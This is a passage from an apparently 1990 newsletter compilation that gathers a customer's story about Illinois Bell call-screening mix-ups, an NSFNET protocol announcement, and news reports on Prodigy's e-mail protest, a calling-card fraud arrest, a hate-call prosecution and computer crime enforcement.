  6141.          Call Screening *60
  6142.          Alternate Answer  (supposed to be programmed to Voice Mail;
  6143.                             another CO; another area code U708e;
  6144.                             even another telco UCentele).
  6145.  
  6146.      Busy Repeat Dialing did not work on the second line (not installed) and
  6147. Alternate Answer worked (but not as I understood it would) on the first line.
  6148. Plus, I had forgotten how to add 'last call received' to the screening feature.
  6149.  
  6150.      It is 5:45 ...  business office open another fifteen minutes ...  good!  I
  6151. call 1-800-244-4444 which is IBT's idea of a new way to handle calls to the
  6152. business office.  Everyone in the state of Illinois calls it, and the calls go
  6153. wherever someone is free.  Before, we could call the business office in our
  6154. neighborhood direct ...  no longer.
  6155.  
  6156.      I call; I go on hold; I wait on hold five minutes.  Finally a rep comes on
  6157. the line, a young fellow who probably Meant Well ...
  6158.  
  6159.      After getting the preliminary information to look up my account, we begin
  6160. our conversation:
  6161.  
  6162. Me:  You see from the order the new features put on today?
  6163. Him: Yes, which ones are you asking about?
  6164. Me:  A couple questions. Explain how to add the last call received to
  6165.      your call screening.
  6166. Him: Call screening? Well, that's not available in your area yet. You
  6167.      see, it will be a few months before we offer it.
  6168. Me:  Wait a minute!  It was quoted to me two days ago, and it is on
  6169.      the order you are reading now is it not?
  6170.      UI read him the order number to confirm we had the same one.e
  6171.  
  6172. Him: Yes, it is on here, but it won't work. No matter what was written
  6173.      up. Really, I have to apologize for whoever would have taken your
  6174.      order and written it there.
  6175.  
  6176. Me:  Hold on, hold on!  It *is* installed, and it *is* working! I want
  6177.      to know how to work it.
  6178.  
  6179. Him: No it is not installed. The only features we can offer you at
  6180.      at this time are Busy Redial and Auto Callback. Would you like me
  6181.      to put in an order for those?
  6182.  
  6183. Me:  Let's talk to the supervisor instead.
  6184.  
  6185. Him: (in a huff) Gladly sir.
  6186.  
  6187. Supervisor comes on line and repeats what was said by the rep: Call
  6188. Screening is not available at this time in Chicago-Rogers Park.
  6189.  
  6190. At this point I am furious ...
  6191.  
  6192. Me:  Let me speak to the rep who took this order (I quoted her by
  6193.      name.)
  6194.  
  6195. Supervisor: I never heard of her. She might be in some other office.
  6196.  
  6197. Me: (suspicious) Say, is this Irving-Kildare?
  6198.  
  6199. Supervisor: No! Of course not! I am in Springfield, IL.
  6200.  
  6201. Me: Suppose you give me the name of the manager at Irving-Kildare
  6202. then, and I will call there tomorrow. (By now it was 6 PM; the
  6203. supervisor was getting figity and nervous wanting to go home.)
  6204.  
  6205. Supervisor: Here! Call this number tomorrow and ask for the manager of
  6206.             that office, 1-800-244-4444.
  6207.  
  6208. Me:  Baloney! Give me the manager's direct number!
  6209.  
  6210. Supervisor: Well okay, 312-xxx-xxxx, and ask for Ms. XXXX.
  6211.  
  6212. Me: (suspicious again) She is the manager there?
  6213.  
  6214. Supervisor: Yes, she will get you straightened out. Goodbye!
  6215.  
  6216.      Comes Friday morning, I am on the phone a few minutes before 9 AM, at the
  6217. suggested direct number.  Ms.  XXXX reviewed the entire order and got the Busy
  6218. Repeat Dial feature added to line two ...  but she insisted the original rep
  6219. was 'wrong for telling you call screening was available ..' and the obligatory
  6220. apology for 'one of my people who mislead you'.  I patiently explained to her
  6221. also that in fact call screening was installed and was working.
  6222.  
  6223. Manager:  Oh really? Are you sure?
  6224.  
  6225. Me:  I am positive. Would you do me a favor? Call the foreman and have
  6226.      him call me back.
  6227.  
  6228. Manager: Well, someone will call you later.
  6229.  
  6230.      Later that day, a rep called to say that yes indeed, I was correct.  It
  6231. seems they had not been told call screening was now available in my office.  I
  6232. told her that was odd, considering the rep who first took the order knew all
  6233. about it.
  6234.  
  6235.      I asked when the Alternate Answer 'would be fixed' (bear in mind I thought
  6236. it would work outside the CO, which it would not, which is why it kept ringing
  6237. through to me instead of forwarding.)
  6238.  
  6239. She thought maybe the foreman could figure that out.
  6240.  
  6241.      Maybe an hour later, a techician did call me to say he was rather
  6242. surprised that call screening was working on my line.  He gave a complete and
  6243. concise explanation of how Alternate Answer and Transfer on Busy/No Answer was
  6244. to work.  He offered to have it removed from my line since it would be of no
  6245. value to me as configured.
  6246.  
  6247.      One question he could not answer:  How do you add the last call received
  6248. to call screening?  He could find the answer nowhere, but said he would see to
  6249. it I got 'the instruction booklet' in the mail soon, so maybe I could figure it
  6250. out myself.
  6251.  
  6252.      I got busy with other things, and put the question aside ...  until early
  6253. Saturday morning when I got one of my periodic crank calls from the same number
  6254. which has plagued me for a couple months now with ring, then hangup calls on an
  6255. irregular basis.
  6256.  
  6257.      For the fun of it, I punched *69, and told the sassy little girl who
  6258. answered the phone to quit fooling around.  She was, to say the least,
  6259. surprised and startled by my call back.  I don't think I will hear from her
  6260. again.  :)
  6261.  
  6262.      But I decided to ask again how to add such a number to call screening,
  6263. so I called Repair Service.
  6264.  
  6265.      The Repair Service clerk pulled me up on the tube *including the work
  6266. order from two days earlier* and like everyone else said:
  6267.  
  6268. Repair:  You don't have Call Screening on your line. That is not
  6269.          available yet in your area. We are adding new offices daily,
  6270.          blah, blah.
  6271.  
  6272.      I *couldn't believe* what I was hearing ...  I told her I did, and she
  6273. insisted I did not ...  despite the order, despite what the computer said.
  6274. Finally it was on to her supervisor, but as it turned out, her supervisor was
  6275. the foreman on duty for the weekend.  Like the others, he began with apologies
  6276. for how I 'had been misinformed' ...  no call screening was available.
  6277.  
  6278. Me:  Tell ya what. You say no, and I say yes. You're on the test
  6279.      board, no?  I'll hang up. You go on my line, dial *60, listen to
  6280.      the recording you hear, then call me back. I will wait here. Take
  6281.      your time. When you call back, you can apologize.
  6282.  
  6283. Foreman: Well, I'm not on the test board, I'm in my office on my own
  6284.      phone.
  6285.  
  6286. Me:  So go to the test board, or pick me up in there wherever it is
  6287.      handy and use my line. Make a few calls. Add some numbers to the
  6288.      call screening; then call me back with egg on your face, okay?
  6289.  
  6290. Foreman: Are you saying call screening is on your line and you have
  6291.      used it?
  6292.  
  6293. Me:  I have used it.  Today. A few minutes ago I played with it.
  6294.  
  6295. Foreman: I'll call you back.
  6296.  
  6297. (Fifteen minutes later) ...
  6298.  
  6299.  
  6300. Foreman:  Mr. Townson!  Umm ... I have been with this company for 23
  6301.      years.  I'll get to the point: I have egg on my face. Not mine
  6302.      really, but the company has the egg on the face. You are correct;
  6303.      your line has call screening.
  6304.  
  6305. Me:  23 years you say?  Are you a member of the Pioneers?
  6306.  
  6307. Foreman: (surprised)  Why, uh, yes I am.
  6308.  
  6309. Me:  Fine organization isn't it ...
  6310.  
  6311. Foreman:  Yes, it certainly is.  You know of them?
  6312.  
  6313. Me:  I've heard a few things.
  6314.  
  6315. Foreman:  Look, let me tell you something. I did not know -- nor *did
  6316. anyone in this office know* that call screening was now available. We
  6317. were told it was coming, that's all.
  6318.  
  6319. Me:  You mean no one knew it was already in place?
  6320.  
  6321. Foreman:  No, apparently not ... I think you are the only customer in
  6322. the Rogers Park office who has it at this time.  Because the
  6323. assumption was it was not yet installed, the reps were told not to
  6324. take orders for it ... I do not know how your order slipped through.
  6325.  
  6326. Me:  Will you be telling others?
  6327.  
  6328. Foreman: I have already made some calls, and yes, others will be told
  6329. about this on Monday.
  6330.  
  6331. Me:  Well, you know the *81 feature to turn call screening on and off
  6332. is still not working.
  6333.  
  6334. Foreman:  I'm not surprised. After all, none of it is supposed to be
  6335. working right now.  You seem to know something about this business,
  6336. Mr. Townson.
  6337.  
  6338. Me: I guess I've picked up a few things along the way.
  6339.  
  6340.      We then chatted about the Transfer on Busy/No Answer feature.  I asked
  6341. why, if my cell phone on 312-415-xxxx had the ability to transfer calls out of
  6342. the CO and be programmed/turned on and off from the phone itself, my wire line
  6343. could not.  312-415 is out of Chicago-Congress ...  he thought it might have to
  6344. do with that office having some different generics than Rogers Park ...  but he
  6345. could not give a satisfactory answer.
  6346.  
  6347.  
  6348. Patrick Townson
  6349.  
  6350.  
  6351.  
  6352. _______________________________________________________________________________
  6353.  
  6354.  
  6355. The following article appeared in the U-M Computing Center News
  6356. (October 25, 1990, V 5, No 18, Pg 10)
  6357.  
  6358. [This article was also reprinted in TELECOM digest -DH]
  6359. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6360.  
  6361. NSFNET DEMONSTRATES INTERCONTINENTAL ISO TRANSMISSION
  6362.  
  6363. [Editor's note: The following article is reprinted, with modifications,
  6364.  from the September 1990 issue of the Link Letter (Vol 3, No 4),
  6365. published by the Merit/NSFNET backbone project]
  6366.  
  6367. At the end of September, partners in the National Science Foundation Network
  6368. (NSFNET) announced a succesful demonstration of intercontinental data
  6369. transmission using the International Standards Organization Conectionless
  6370. Network Protocol (ISO CLNP).  The international exchange of ISO CLNP packets
  6371. was demonstrated betweeen end systems at the NSFNET Network Operations Center
  6372. in Ann Arbor and in Bonn, West Germany, using the NSFNET backbone
  6373. infrastructure and the European Academic Supercomputer Initiative (EASInet)
  6374. backbone.
  6375.  
  6376. The prototype OSI implementation is intended to provide wide area connectivity
  6377. between OSI networks, including networks using the DECNet Phase V protocols.
  6378.  
  6379. The new software was integrated into the NSFNET's "packet switching" (data
  6380. transmission) nodes by David Katz and Susan Hares of the Merit Computer
  6381. Network, with support from IBM's software developement departments in Milford,
  6382. CT and Yorktown Heights, NY.
  6383.  
  6384. NSFNET is the first federally supported computer network to acheive
  6385. international ISO CLNP transmission on an operating network, according to
  6386. Merit's Hans-Werner Braun, Principle Investigator for the NSFNET Project.
  6387.  
  6388. The Prototype ISO implementation is being designed to coexist with NSFNET's
  6389. operational Internet Protocol (IP) network, and is a significant step towards
  6390. offering ISO services on the NSFNET backbone.  Eric Aupperle, President of
  6391. Merit and acting director of ITD Network Systems, says that "the demonstration
  6392. shows that we're capable of transporting ISO traffic.  Now we're working to
  6393. deploy this experimental service as fast as possible."
  6394.  
  6395. An implementation of CLNP was first demonstrated by Merit/NSFNET staff at the
  6396. InterOp '89 conference.  That implementation of CLNP was originally developed
  6397. as part of the ARGO project at the University of Wisconsin, Madision, with the
  6398. support of the IBM Corporation.
  6399.  
  6400. by Ken Horning
  6401. DTD Network Systems.
  6402. _______________________________________________________________________________
  6403.  
  6404.  
  6405. {Middlesex News}, Framingham, Mass., 11/2/90
  6406.  
  6407. Prodigy Pulls Plug on Electronic Mail Service For Some
  6408.  
  6409. By Adam Gaffin
  6410.  
  6411. NEWS STAFF WRITER
  6412.  
  6413. Users of a national computer network vow to continue a protest against
  6414. censorship and a new charge for electronic mail even though the company kicked
  6415. them off-line this week.
  6416.  
  6417. Brian Ek, spokesman for the network, Prodigy, said the "handful" of users had
  6418. begun harassing other users and advertisers on the service and that some had
  6419. even created programs "to flood members' 'mailboxes' with (thousands of)
  6420. repeated and increasingly strident harangues," he said.
  6421.  
  6422. But leaders of the protest say they sent only polite letters -- approved by the
  6423. company's legal department -- using techniques taught by the company itself.
  6424. Up to nine of them had their accounts pulled hips week.
  6425.  
  6426. Protests began in September when the company said it would cut unlimited
  6427. electronic mail from its monthly fee -- which includes such services as on-line
  6428. airline reservations, weather and games -- and would charge 25 cents for every
  6429. message above a monthly quota of 30.  Ek says the design of the Prodigy network
  6430. makes "e-mail" very expensive and that few users send more than 30 messages a
  6431. month.
  6432.  
  6433. But Penny Hay, the only organizer of the "Cooperative Defense Committee" whose
  6434. account was not shut this week, said she and others are upset with Prodigy's
  6435. "bait and switch" tactics:  The company continues to promote "free" electronic
  6436. mail as a major feature.  She said Prodigy itself had spurred use of e-mail by
  6437. encouraging subscribers to set up private e-mail ``lists'' rather than use
  6438. public forums and that the charges will especially hurt families, because the
  6439. quota is per household, not person.
  6440.  
  6441. Ek said relatively few members protested the rate chqange.  Gary Arlen, who
  6442. publishes a newsletter about on-line services, called the controversy "a
  6443. tempest in a teapot."
  6444.  
  6445. Hay, however, said the group now has the backing of nearly 19,000 Prodigy users
  6446. -- the ones advertisers would want to see on-line because they are the most
  6447. active ones on the system and so more likely to see their ads.
  6448.  
  6449. The group is also upset with the way the company screens messages meant for
  6450. public conferences.  Other services allow users to see "postings"
  6451. immediately.
  6452.  
  6453. "They are infamous for this unpredicible and unfathomable censorship," Hay
  6454. said.
  6455.  
  6456. "We feel what we are doing is not censoring because what we are essentially
  6457. doing is electronic publishing," Ek said, comparing the public messages to
  6458. letters to the editor of a family newspaper.
  6459.  
  6460. Neil Harris, marketing director at the competing GEnie service, said many
  6461. people would feel intimidated knowing that what they write is being screened.
  6462. He said GEnie only rarely has to deleted messages.  And he said GEnie has
  6463. picked up several thousand new customers from among disgruntled Prodigy users.
  6464.  
  6465. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6466.  
  6467. "Conversations with Fred," {Middlesex News}, Framingham, 11/6/90.
  6468.  
  6469. The story is bizarre but true, swears Herb Rothman.  Seems Prodigy, the network
  6470. run as a joint venture by Sears and IBM, wouldn't let somebody post a message
  6471. in a coin-collecting forum that he was looking for a particular Roosevelt dime
  6472. for his collection.  Upset, the man called "member services." The
  6473. representative told him the message violated a Prodigy rule against mentioning
  6474. another user in a public message.  "What user?" the man asked.  "Roosevelt
  6475. Dime," the rep replied.  "That's not a person!" the man said.  "Yes he is,
  6476. he's a halfback for the Chicago Bears," the rep shot back.
  6477.  
  6478. Rothman is one of those alleged compu-terrorists Prodigy claims is harassing
  6479. other users and companies that advertise on the service by sending out
  6480. thousands upon thousands of increasingly hostile messages in protest of a
  6481. Prodigy plan to begin charging users who send more than 30 e-mail messages a
  6482. month.  Rothman and the others say they sent very polite messages to people
  6483. (Penny Hay of Los Angeles says her messages were even approved by the Prodigy
  6484. legal department) telling them about the new fees and urging them to protest.
  6485.  
  6486. What's really happening is that Prodigy is proving its complete arrogance and
  6487. total lack of understanding of the dynamics of on-line communication.  They
  6488. just don't get it.  People are NOT going to spend nearly $130 a year just to
  6489. see the weather in Oregon or order trips to Hawaii.
  6490.  
  6491. Even the computerphobes Prodigy wants to attract quickly learn the real value
  6492. of the service is in finding new friends and holding intelligent "discussions"
  6493. with others across the country.
  6494.  
  6495. But Prodigy blithely goes on censoring everything meant for public consumption,
  6496. unlike other nationwide services (or even bulletin-board systems run out of
  6497. some teenager's bedroom).  Rothman's story is not the only one about capricious
  6498. or just plain stupid censoring.  Dog fanciers can't use the word ``bitch'' when
  6499. talking about their pets, yet the service recently ran an advice column all
  6500. about oral sex.  One user who complained when a message commenting on the use
  6501. of the term "queen bitch" on "L.A.  Law" was not allowed on was told that
  6502. "queen b***h" would be acceptable, because adults would know what it meant
  6503. but the kiddies would be saved.
  6504.  
  6505. So when the supposed technology illiterates Prodigy thinks make up its user
  6506. base managed to get around this through the creation of private mail "lists"
  6507. (and, in fact, many did so at the urging of Prodigy itself!), Prodigy started
  6508. complaining of "e-mail hogs," quietly announced plans to levy charges for more
  6509. than a minute number of e-mail messages each month and finally, simply canceled
  6510. the accounts of those who protested the loudest!
  6511.  
  6512. And now we are watching history in the making, with the nation's first
  6513. nationwide protest movement organized almost entirely by electronic mail (now
  6514. don't tell Prodigy this, but all those people they kicked off quickly got back
  6515. onto the system -- Prodogy allows up to six users per household account, and
  6516. friends simply loaned their empty slots to the protest leaders).
  6517.  
  6518. It's truly amazing how little faith Prodigy has in the ability of users to
  6519. behave themselves.  Other systems have "sysops" to keep things in line, but
  6520. rarely do they have to pull messages.  Plus, Prodigy is just being plain dumb.
  6521. Rothman now has a mailing list of about 1,500.  That means every time he sends
  6522. out one of his newsletters on collectibles, he sends 1,500 e-mail messages,
  6523. which, yes, costs more for Prodigy to send over long-distance lines and store
  6524. in its central computers.  But if they realized their users are generally
  6525. mature, rather than treating them as 4-year-olds, Rothman could post just one
  6526. message in a public area, that everybody could see.
  6527.  
  6528. Is this any way to run an on-line system?  Does Prodigy really want to drive
  6529. away the people most inclined to use the service -- and see all those ads that
  6530. pop up at the bottom of the screen?  Prodigy may soon have to do some
  6531. accounting to the folks at IBM and Sears, who by most accounts have already
  6532. poured at least $750 million into "this thing."
  6533.  
  6534. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - -
  6535. With your computer and modem, you can reach Fred the Middlesex News
  6536. Computer anytime, day or night, at (508) 872-8461. Set your parameters
  6537. to 8-1-N and up to 2400 baud.
  6538.  
  6539. _______________________________________________________________________________
  6540.  
  6541.  
  6542. HEADLINE  Cops Say Hacker, 17, `Stole' Phone Service
  6543.           Byline:   By Joshua Quittner
  6544. DATE      10/31/90
  6545. SOURCE    Newsday (NDAY)
  6546.           Edition:  NASSAU AND SUFFOLK
  6547.           Section:  NEWS
  6548.           Page:     02
  6549.           (Copyright Newsday Inc., 1990)
  6550.  
  6551. State Police arrested a 17-year-old computer hacker at his terminal yesterday
  6552. afternoon, and charged the Bethpage High School student with using his computer
  6553. to run up more than $1 million worth of long-distance telephone calls on credit
  6554. card numbers he deciphered.
  6555.  
  6556. State Police Senior Investigator Donald Delaney, who supervised the
  6557. investigation and arrest of John Farrell, of 83 S.  Third St., said that the
  6558. case was among the first to rely on new technology developed by
  6559. telecommunications engineers to track long-distance telephone-service abusers.
  6560.  
  6561. Investigators believe that as early as December, 1989, Farrell was using his
  6562. computer and a homemade electronic device, known as a black box, to
  6563. sequentially dial telephone numbers, which double as credit card numbers.  By
  6564. automatically calling the numbers in sequence, Farrell hoped to trigger a
  6565. signal indicating a valid credit card number.
  6566.  
  6567. However, AT&T, which recently developed software to detect such sequential
  6568. dialing, alerted Delaney's office in September of Farrell's alleged attempts.
  6569. In July, investigators surreptitiously placed a "pen register" - a device that
  6570. records all numbers dialed from a particular phone line - on Farrell's
  6571. telephone, Delaney said.
  6572.  
  6573. State Police and U.S.  Secret Service agents - the federal agency has been
  6574. taking an active part in computer crimes and investigates credit card fraud -
  6575. staked out Farrell's house yesterday afternoon.  Shortly after 3 p.m., when the
  6576. youth arrived home from school, technicians monitoring his telephone line
  6577. signaled the police that he had already turned on his computer and was using an
  6578. illegal credit card number to access an electronic bulletin board in Illinois,
  6579. police said.  Officers, armed with a search warrant, then entered the house and
  6580. arrested Farrell.
  6581.  
  6582. Delaney said Farrell found over 100 long-distance credit card numbers, from
  6583. four long-distance carriers, and posted them on rogue electronic bulletins
  6584. boards in Virginia, Chicago, Denmark and France.  Although he allegedly made
  6585. most of the illegal calls, other hackers also used the numbers.  The majority
  6586. of the calls - more than $600,000 worth - were billed to four corporate card
  6587. numbers, said Delaney, who added that the phone company is responsible for such
  6588. losses.  Farrell was arrested and charged with six felonies, including grand
  6589. larceny, computer trespass and criminal possession of stolen property.  The
  6590. charges carry a maximum penalty of four years in prison.  He was released into
  6591. the custody of his parents last night.  Neither Farrell nor his parents could
  6592. be reached for comment yesterday.  Farrell was associated with a group of
  6593. hackers who called themselves Paradox, Delaney said.
  6594.  
  6595. _______________________________________________________________________________
  6596.  
  6597.  
  6598. HEADLINE  Menacing calls started out as prank, says participant
  6599.           Byline:   Katharine Webster and Graciella Sevilla
  6600.           Credit:   Staff Writer
  6601.           Notes:    Editions vary : Head varies
  6602. DATE      10/28/90
  6603. SOURCE    The San Diego Union and Tribune (SDU)
  6604.           Pub:      UNION
  6605.           Edition:  1,2,3,4,5,6
  6606.           Section:  LOCAL
  6607.           Page:     B-1
  6608.           (Copyright 1990)
  6609.  
  6610. A three-year campaign of telephoned threats and ethnic slurs directed against
  6611. the Jewish owner of a National City pawn shop started out as a "stupid prank"
  6612. that grew to include more than 100 people, according to one of the young men
  6613. who participated in the harassment.  "Little did I know when I started this
  6614. three years ago, that it would escalate into my brother calling (David Vogel)
  6615. 10 times a day," said Gary Richard Danko, 21, of Chula Vista, who cooperated
  6616. with the FBI investigation that resulted in the indictment Wednesday of his
  6617. older brother and two other men on civil rights charges.
  6618.  
  6619. Michael Dennis Danko, 23, and Brett Alan Pankauski, 22, both of Chula Vista,
  6620. and Jeffrey Alan Myrick, 21, of Paradise Hills in San Diego, pleaded not guilty
  6621. in U.S.  District Court yesterday to a six-count indictment charging them with
  6622. wire fraud and felony conspiracy to violate the civil rights of David Vogel, a
  6623. 66-year-old Jewish immigrant who escaped the Holocaust.
  6624.  
  6625. Pankauski was released on $10,000 bail and admonished to avoid all contact with
  6626. Vogel.  But Danko and Myrick were held without bail pending an Oct.  4
  6627. detention hearing after federal prosecutor Michael McAuliffe convinced
  6628. Magistrate Irma Gonzalez that they posed substantial flight risks.
  6629.  
  6630. On Wednesday, Gary Danko and a friend, Robert John Byrd, 21, also of Chula
  6631. Vista, pleaded guilty to one misdemeanor count of conspiring to violate Vogel's
  6632. civil rights, according to a spokesman for the U.S.  attorney's office.  The
  6633. two friends, who met while working at a 7-Eleven, were released and agreed to
  6634. testify at the trial of the remaining three defendants.
  6635.  
  6636. Though the arrests climaxed a five-month investigation involving the FBI, U.S.
  6637. attorney's office and the Department of Justice, Gary Danko said yesterday that
  6638. the menacing phone calls to numbers picked "at random" from the telephone book
  6639. began years ago.
  6640.  
  6641. The group of friends, most of whom have known each other since elementary
  6642. school, all used to make crank phone calls, Danko said, even to each other.
  6643. They also experimented with breaking codes for answering machines and changing
  6644. the outgoing message to something profane.
  6645.  
  6646. While he said he stopped making the calls to Vogel a couple of years ago, his
  6647. brother and others "took it out to a degree to torment the guy."
  6648.  
  6649. "I feel bad that it turned out this way," Danko said.  "I wish there was some
  6650. way I could make it up to David (Vogel)."
  6651.  
  6652. "I know how he feels," Danko added.  "Ever since I've had my own phone line
  6653. I've had harassing phone calls between 2 and 6 in the morning to the point
  6654. where I've changed my phone number three times." Danko denied that he, his
  6655. brother, or any of the other defendants in the case were racists or that they
  6656. had targeted Vogel for any particular reason.  He said that the defendants made
  6657. crank calls to many people, and that the anti-Jewish nature of the calls to
  6658. Vogel was probably based on a "lucky guess" that he was Jewish.
  6659.  
  6660. According to the indictment, Michael Danko, Myrick, and Pankauski made phone
  6661. calls in which they referred to Nazi concentration camps and Hitler, while
  6662. threatening to harm Vogel and his pawn-shop business.
  6663.  
  6664. Vogel said he began receiving the phone calls -- which included racial slurs
  6665. and taunts about his wife -- in 1987.  Sometimes he received up to 12 calls a
  6666. day, creating a "personal hell." Earlier this year, he finally hired a private
  6667. investigator, who then turned the case over to the FBI.
  6668.  
  6669. "It caused suffering for us like the concentration camps did for my family,"
  6670. Vogel said.  "It was horrible."
  6671.  
  6672. Another relative of Gary and Michael Danko, who asked not to be identified,
  6673. said he thought the calls to Vogel continued only "because they got a reaction
  6674. out of him -- he screamed and yelled at them." But he said Vogel was probably
  6675. not the only Jew targeted in the phone calls.
  6676.  
  6677. The relative agreed with FBI agents, who described these incidents as isolated
  6678. and not connected with organized racist groups such as the Skinheads.
  6679.  
  6680. Instead, he said, the brothers thought they were doing "something funny." He
  6681. said he thought they still didn't realize they were doing something wrong, even
  6682. though he had "yelled and screamed at them" to stop.
  6683.  
  6684. Gary Danko is a computer "hacker" who works at a computer store, he said.
  6685. Michael Danko was unemployed.
  6686.  
  6687. FBI agents began investigating the calls in May, when they placed a tape
  6688. recorder on Vogel's phone.  It only took a few moments before the first hate
  6689. call came in.
  6690.  
  6691. Agents traced the calls to a number of phone booths and then began putting
  6692. together the wire-fraud case.
  6693.  
  6694. In addition to the civil rights violations, the indictment alleges that the
  6695. three defendants conspired to obtain unauthorized AT&T long-distance access
  6696. codes to make long-distance phone calls without paying for them.
  6697.  
  6698. If convicted of the civil rights and wire-fraud charges, the defendants could
  6699. face up to 15 years in prison and $500,000 in fines.  In addition, they face
  6700. various additional charges of illegally obtaining and using the restricted
  6701. long-distance access codes.
  6702.  
  6703. Yesterday, Vogel angrily rejected the notion that these callers were less than
  6704. serious in their intentions.
  6705.  
  6706. "They're full of baloney.  They don't know what they are talking about," he
  6707. said.
  6708.  
  6709. _______________________________________________________________________________
  6710.  
  6711. HEADLINE  SHORT-CIRCUITING DATA CRIMINALS
  6712.           STEPS CAN BE TAKEN TO DETECT AND PREVENT COMPUTER SECURITY BREACHES,
  6713.           BUT BUSINESSES HESITATE TO PROSECUTE
  6714.           Byline:   Mary J. Pitzer Daily News Staff Writer
  6715.           Notes:    MONDAY BUSINESS: COVER STORY THE PRICE OF COMPUTER
  6716.           CRIME. Second of two parts
  6717. DATE      10/22/90
  6718. SOURCE    LOS ANGELES DAILY NEWS   (LAD)
  6719.           Edition:  Valley
  6720.           Section:  BUSINESS
  6721.           Page:     B1
  6722.           (Copyright 1990)
  6723.  
  6724. Along with other telecommunications companies, Pacific Bell is a favorite
  6725. target for computer crime.
  6726.  
  6727. "We're a victim," said Darrell Santos, senior investigator at Pacific Bell.
  6728. "We have people hacking us and trying to get into our billables.  It seems like
  6729. a whole lot of people are trying to get into the telecommunications network."
  6730.  
  6731. But the company is fighting back.  About seven employees in its investigative
  6732. unit work with different law enforcement agencies to track down criminals, many
  6733. of whom use the phone lines to commit computer crimes.
  6734.  
  6735. In cooperation with authorities Pacific Bell investigators collect evidence,
  6736. trace calls, interview suspects and testify in court.  They even do their own
  6737. hacking to figure out what some of their chief adversaries are up to.
  6738.  
  6739. "We take a (telephone) prefix and hack the daylights out of it.  We hack our
  6740. own numbers," Santos said.  "Hey, if we can do it, think of what those brain
  6741. childs are doing."
  6742.  
  6743. Few companies are nearly so aggressive.  For the most part computer crime is a
  6744. growing business that remains relatively unchecked.  State and federal laws
  6745. against computer crime are in place, but few cases are prosecuted.  Most
  6746. incidents go unreported, consultants say.
  6747.  
  6748. "We advise our clients not to talk about losses and security because just
  6749. talking about them in public is a breach," said Donn Parker, a senior managment
  6750. consultant at SRI International in Palo Alto.  "Mostly companies handle
  6751. incidents privately or swallow the loss."
  6752.  
  6753. Most problematic is that few companies have tight enough security to protect
  6754. themselves.
  6755.  
  6756. "On a scale of one to 10, the majority of companies are at about a two," said
  6757. Jim Harrigan, senior security consultant at LeeMah Datacom Security Corp.,
  6758. which sells computer security products.
  6759.  
  6760. Current laws are strong enough to convict computer criminals, security experts
  6761. say.  But they have been little used and sentences are rarely stiff, especially
  6762. because so many violators are juveniles.
  6763.  
  6764. Fewer than 250 computer crime cases have been prosecuted nationally, according
  6765. to Kenneth Rosenblatt, head of the Santa Clara County district attorney's high
  6766. technology unit.  Rosenblatt co-authored California's recent computer crime
  6767. law, which creates new penalties such as confiscation of computer equipment.
  6768.  
  6769. Under a strengthened federal Computer Fraud and Abuse Act, Cornell University
  6770. graduate student Robert T.  Morris Jr.  was convicted of unleashing a computer
  6771. virus in Internet, a large computer network tying universities and government
  6772. facilities.  Though the virus was not intended to destroy programs, it infected
  6773. thousands of computers and cost between $100,000 and $10 million to combat,
  6774. according to author and hacking expert Cliff Stoll.
  6775.  
  6776. Morris was sentenced to three years probation and a $10,000 fine.
  6777.  
  6778. A major problem in policing computer crime is that investigators are
  6779. understaffed and undertrained, Rosenblatt said.  While Los Angeles and other
  6780. police departments have computer crime units, most are not geared for it, he
  6781. said.  And violent crimes take precedence.
  6782.  
  6783. Rosenblatt would like to see greater regional cooperation and coordination
  6784. among local law enforcement agencies.
  6785.  
  6786. Because investigators are understaffed, they must depend on their victims to
  6787. gather enough evidence to convict the culprits.  And that can be fraught with
  6788. difficulties, Kenneth Weaver, criminal investigator in the San Diego district
  6789. attorney's office, said at a recent security conference in Newport Beach.
  6790.  
  6791. In one case a company's computer system crashed and its programs were erased 30
  6792. days after an employee left the firm.  With six months of backup tapes, the
  6793. company was able to document what had happened.  The District Attorney's office
  6794. asked to estimate how much money had been lost.
  6795.  
  6796. The total came to $3,850, well below the $5,000 in damages needed for a felony
  6797. case, Weaver said.  And then the information was delayed 14 months.  It needed
  6798. to be reported in 12 months for the D.A.  to go forward with the case.
  6799.  
  6800. "We were prevented from prosecuting," Weaver said.  In California, 71 percent
  6801. of the cases result in convictions once arrests are made, according to the
  6802. National Center for Computer Crime Data.
  6803.  
  6804. But when prosecutors do make a case, there can be more trouble.  Some prominent
  6805. people in the computer industry have complained that a 2-year investigation by
  6806. the U.S.  Secret Service infringed on civil rights.
  6807.  
  6808. The investigation, code-named Operation Sun Devil, was started to snare members
  6809. of the Legion of Doom, an elite hacker group.  The Secret Service suspected
  6810. that they had broken into BellSouth Corp.'s telephone network and planted
  6811. destructive programs that could have knocked out emergency and customer phone
  6812. service across several states.  Last spring, hacker dens in 13 cities were
  6813. raided.  Two suspects have been charged with computer crimes, and more arrests
  6814. are expected.
  6815.  
  6816. But a group called EFF, formed in July by Lotus Development Corp.  founder
  6817. Mitchell D.  Kapor and Apple Computer Inc.  co-founder Stephen Wozniak, has
  6818. objected to the crackdown as overzealous.
  6819.  
  6820. "The excesses of Operation Sun Devil are only the beginning of what threatens
  6821. to become a long, difficult, and philosophically obscure struggle between
  6822. institutional control and individual liberty," Kapor wrote in a paper with
  6823. computer expert and Grateful Dead lyricist John Perry Barlow.
  6824.  
  6825. So far, the foundation has granted $275,000 to Computer Professionals for
  6826. Social Responsibility to expand its ongoing work on civil liberties protections
  6827. for computer users.
  6828.  
  6829. The foundation also is offering legal assistance to computer users who may have
  6830. had their rights infringed.  For example, it provided legal support to Craig
  6831. Neidorf, publisher of an online hacking "magazine." Neidorf had been charged
  6832. with felony wire fraud and interstate transportation of stolen property for
  6833. publishing BellSouth network information.
  6834.  
  6835. Neidorf said he was not aware the information was stolen.  EFF claimed that
  6836. Neidorf's right to free speech had been violated.  The government dropped its
  6837. case after EFF representatives found that the apparently stolen information was
  6838. publicly available.
  6839.  
  6840. Companies that want to prosecute computer crime face other dilemmas.
  6841.  
  6842. "The decision to bring in public authorities is not always the best," said
  6843. Susan Nycum, an attorney at Baker & McKenzie in Palo Alto.
  6844.  
  6845. In a criminal case, the company loses control over what information is made
  6846. public in the trial.  But companies can pursue civil remedies that enable them
  6847. to keep a lower profile.  Suing for theft of trade secret, for example, would
  6848. be one avenue, Weaver said.
  6849.  
  6850. Many companies are reluctant to beef up security even if they know the risks
  6851. from computer crime.  First, they worry that making access to computers more
  6852. difficult would lower productivity.  There also is concern that their technical
